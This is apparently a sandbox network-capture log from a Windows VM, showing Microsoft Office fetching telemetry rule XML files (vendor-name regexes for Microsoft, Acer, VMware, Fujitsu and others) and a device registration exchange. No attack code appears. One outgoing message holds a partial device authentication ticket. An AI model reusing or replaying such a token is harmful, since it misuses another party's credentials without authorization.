Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:26 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:26 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193926Z-16547b76f7fj5p7mhC1DFWf8w40000000hrg000000009qcg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:26 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49737	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:26 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:26 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:26 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-16547b76f7fxsvjdhC1DFWprrs0000000hmg00000000077f x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:26 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49739	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:26 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:26 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:26 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 09da145b-201e-0033-5108-32b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193926Z-16547b76f7flf9g6hC1DFWmcx8000000084g00000000ccc1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:26 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49740	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:26 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 48 61 6f 2f 46 32 6d 79 6b 43 39 31 38 6d 57 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 39 32 61 34 32 35 38 30 37 66 30 63 63 66 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 5Hao/F2mykC918mW.1Context: 992a425807f0ccf0
2024-11-13 19:39:26 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-13 19:39:26 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 48 61 6f 2f 46 32 6d 79 6b 43 39 31 38 6d 57 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 39 32 61 34 32 35 38 30 37 66 30 63 63 66 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 4e 31 50 6f 47 59 2f 6d 42 65 45 67 6f 38 6a 67 58 38 64 68 62 49 74 51 68 6a 52 4a 36 70 56 4c 48 32 38 35 41 6f 79 46 68 4c 67 71 78 51 53 62 63 72 6b 44 38 77 6b 67 39 5a 4c 49 44 35 52 69 4f 30 5a 6d 46 6e 32 4c 74 46 39 39 6c 31 4b 53 30 46 53 6b 55 55 39 34 6a 39 67 6d 7a 4d 4f 70 59 56 71 54 51 67 6d 48 42 39 54 31 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5Hao/F2mykC918mW.2Context: 992a425807f0ccf0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAfN1PoGY/mBeEgo8jgX8dhbItQhjRJ6pVLH285AoyFhLgqxQSbcrkD8wkg9ZLID5RiO0ZmFn2LtF99l1KS0FSkUU94j9gmzMOpYVqTQgmHB9T1
2024-11-13 19:39:26 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 35 48 61 6f 2f 46 32 6d 79 6b 43 39 31 38 6d 57 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 39 32 61 34 32 35 38 30 37 66 30 63 63 66 30 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: 5Hao/F2mykC918mW.3Context: 992a425807f0ccf0
2024-11-13 19:39:26 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-13 19:39:26 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 61 50 76 69 70 48 4d 6f 75 45 4b 58 41 79 4e 7a 75 4e 48 64 66 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: aPvipHMouEKXAyNzuNHdfA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49742	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:27 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:27 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 87935f62-301e-0033-36a7-34fa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193927Z-r178fb8d7655k45rhC1DFWpsgg000000019g00000000wbyx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:27 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49743	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:27 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: c860b0c2-d01e-007a-2fa3-34f38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193927Z-r178fb8d765jv86hhC1DFW8pt000000001kg000000002us2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:27 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:27 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:27 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193927Z-16547b76f7fkj7j4hC1DFW0a9g0000000hng0000000048gr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:27 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	49741	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:27 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:27 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: f6249f53-a01e-0053-16a5-348603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193927Z-r178fb8d765hbcjvhC1DFW50zc00000001dg00000000rkpk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:27 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	49745	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:27 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:27 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:27 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193927Z-16547b76f7fkcrm9hC1DFWxdag0000000hkg00000000y90u x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:27 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	49746	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:28 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:28 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 5dc315bb-301e-0096-66a5-34e71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193928Z-1749fc9bdbdjgplnhC1DFWhrks000000016g00000000t6x9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	49747	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:28 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:28 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:28 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 75035ba1-b01e-005c-42fb-2c4c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193928Z-16547b76f7flf9g6hC1DFWmcx8000000082000000000tn43 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:28 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" 